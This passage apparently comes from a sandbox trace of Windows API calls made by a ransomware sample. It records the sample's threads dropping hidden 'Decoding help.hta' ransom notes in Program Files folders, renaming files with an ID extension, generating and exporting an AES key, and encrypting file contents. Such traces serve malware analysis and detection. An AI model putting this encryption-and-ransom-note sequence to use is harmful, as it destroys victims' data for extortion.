shared\\VSTO\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*" [0050.575] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*") returned 70 [0050.575] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" [0050.575] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*.*" [0050.575] GlobalMemoryStatus (in: lpBuffer=0xa74fd10 | out: lpBuffer=0xa74fd10) [0050.575] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2520fc30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x678 [0050.729] CloseHandle (hObject=0x678) returned 1 [0050.729] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0xa74fd30 | out: lpFindFileData=0xa74fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1336200, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x274de510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1336200, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstaller.config", cAlternateFileName="VSTOIN~1.CON")) returned 1 [0050.729] lstrcpyW (in: lpString1=0x10bd64d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*" [0050.729] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*") returned 70 [0050.729] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\Decoding help.hta" [0050.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\decoding help.hta")) returned 0xffffffff [0050.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0052.692] WriteFile (in: hFile=0x2f0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa74fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa74fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.029] CloseHandle (hObject=0x2f0) returned 1 [0055.317] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.160] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VSTOInstaller.config") returned -1 [0058.160] lstrlenW (lpString="VSTOInstaller.config") returned 20 [0058.160] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*" [0058.161] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*") returned 70 [0058.161] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\", lpString2="VSTOInstaller.config" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config" [0058.161] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config" [0058.161] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config.[ID]g9uZrLhJaygpwRm1[ID]" [0058.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.672] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc [0060.672] CreateFileMappingA (hFile=0x3cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x490 [0060.672] CryptAcquireContextA (in: phProv=0xa74fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa74fcec*=0x10e28c58) returned 1 [0060.673] CryptGenKey (in: hProv=0x10e28c58, Algid=0x6610, dwFlags=0x1, phKey=0xa74fce8 | out: phKey=0xa74fce8*=0x10a4b168) returned 1 [0060.673] CryptExportKey (in: hKey=0x10a4b168, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa74fbe4, pdwDataLen=0xa74fce4 | out: pbData=0xa74fbe4*, pdwDataLen=0xa74fce4*=0x2c) returned 1 [0060.673] MapViewOfFile (hFileMappingObject=0x490, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c0) returned 0x530000 [0065.045] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa74fbe4*, pdwDataLen=0xa74fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa74fbe4*, pdwDataLen=0xa74fcf8*=0x100) returned 1 [0065.046] CryptEncrypt (in: hKey=0x10a4b168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0xa74fce4*=0x2c0, dwBufLen=0x2c0 | out: pbData=0x530000*, pdwDataLen=0xa74fce4*=0x2c0) returned 1 [0065.046] UnmapViewOfFile (lpBaseAddress=0x530000) Thread: id = 606 os_tid = 0xdbc [0048.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*", lpFindFileData=0xa88fd30 | out: lpFindFileData=0xa88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da578 [0050.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.351] FindNextFileW (in: hFindFile=0x5da578, lpFindFileData=0xa88fd30 | out: lpFindFileData=0xa88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.351] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.351] FindNextFileW (in: hFindFile=0x5da578, lpFindFileData=0xa88fd30 | out: lpFindFileData=0xa88fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9890c900, ftCreationTime.dwHighDateTime=0x1c82168, ftLastAccessTime.dwLowDateTime=0x54a7f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9890c900, ftLastWriteTime.dwHighDateTime=0x1c82168, nFileSizeHigh=0x0, nFileSizeLow=0x38200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSB1ESEN.DLL", cAlternateFileName="")) returned 1 [0050.353] lstrcpyW (in: lpString1=0x2518fa70, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*" [0050.353] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*") returned 68 [0050.353] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\Decoding help.hta" [0050.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\decoding help.hta")) returned 0xffffffff [0050.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x280 [0051.145] WriteFile (in: hFile=0x280, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa88fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa88fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.009] CloseHandle (hObject=0x280) returned 1 [0055.312] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.131] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSB1ESEN.DLL") returned -1 [0058.131] lstrlenW (lpString="MSB1ESEN.DLL") returned 12 [0058.131] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*" [0058.131] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*") returned 68 [0058.131] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\", lpString2="MSB1ESEN.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" [0058.131] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" [0058.131] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.604] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa00 [0061.604] CreateFileMappingA (hFile=0xa00, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9f4 [0061.605] CryptAcquireContextA (phProv=0xa88fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 607 os_tid = 0xdc0 [0048.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*", lpFindFileData=0xaacfd30 | out: lpFindFileData=0xaacfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52694b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61771db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61771db0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d89d0 [0050.581] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.581] FindNextFileW (in: hFindFile=0x5d89d0, lpFindFileData=0xaacfd30 | out: lpFindFileData=0xaacfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52694b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61771db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61771db0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.581] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.581] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.581] FindNextFileW (in: hFindFile=0x5d89d0, lpFindFileData=0xaacfd30 | out: lpFindFileData=0xaacfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f842200, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x6104dbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4f842200, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x337a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.Adapter.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0050.583] lstrcpyW (in: lpString1=0x2523fd00, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*" [0050.583] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*") returned 85 [0050.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Decoding help.hta" [0050.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\decoding help.hta")) returned 0xffffffff [0050.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700 [0051.593] WriteFile (in: hFile=0x700, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xaacfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xaacfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.024] CloseHandle (hObject=0x700) returned 1 [0055.316] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.158] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.VisualStudio.Tools.Applications.Adapter.dll") returned -1 [0058.158] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Adapter.dll") returned 53 [0058.158] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.158] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*" [0058.158] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*.*") returned 85 [0058.158] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\", lpString2="Microsoft.VisualStudio.Tools.Applications.Adapter.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll" [0058.158] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll" [0058.158] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.158] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.adapter.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.adapter.dll.[id]g9uzrlhjaygpwrm1[id]")) Thread: id = 608 os_tid = 0xdc4 [0048.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*", lpFindFileData=0xbdcfd30 | out: lpFindFileData=0xbdcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8150 [0049.292] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.292] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0xbdcfd30 | out: lpFindFileData=0xbdcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.292] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.292] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.292] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0xbdcfd30 | out: lpFindFileData=0xbdcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3080a8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xc60371c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 1 [0049.637] lstrcpyW (in: lpString1=0x10f1ceb0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*" [0049.637] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*") returned 60 [0049.637] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\Decoding help.hta" [0049.637] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\decoding help.hta")) returned 0xffffffff [0049.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0050.377] WriteFile (in: hFile=0x384, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xbdcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xbdcfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.670] CloseHandle (hObject=0x384) returned 1 [0052.160] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.722] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msader15.dll.mui") returned -1 [0056.722] lstrlenW (lpString="msader15.dll.mui") returned 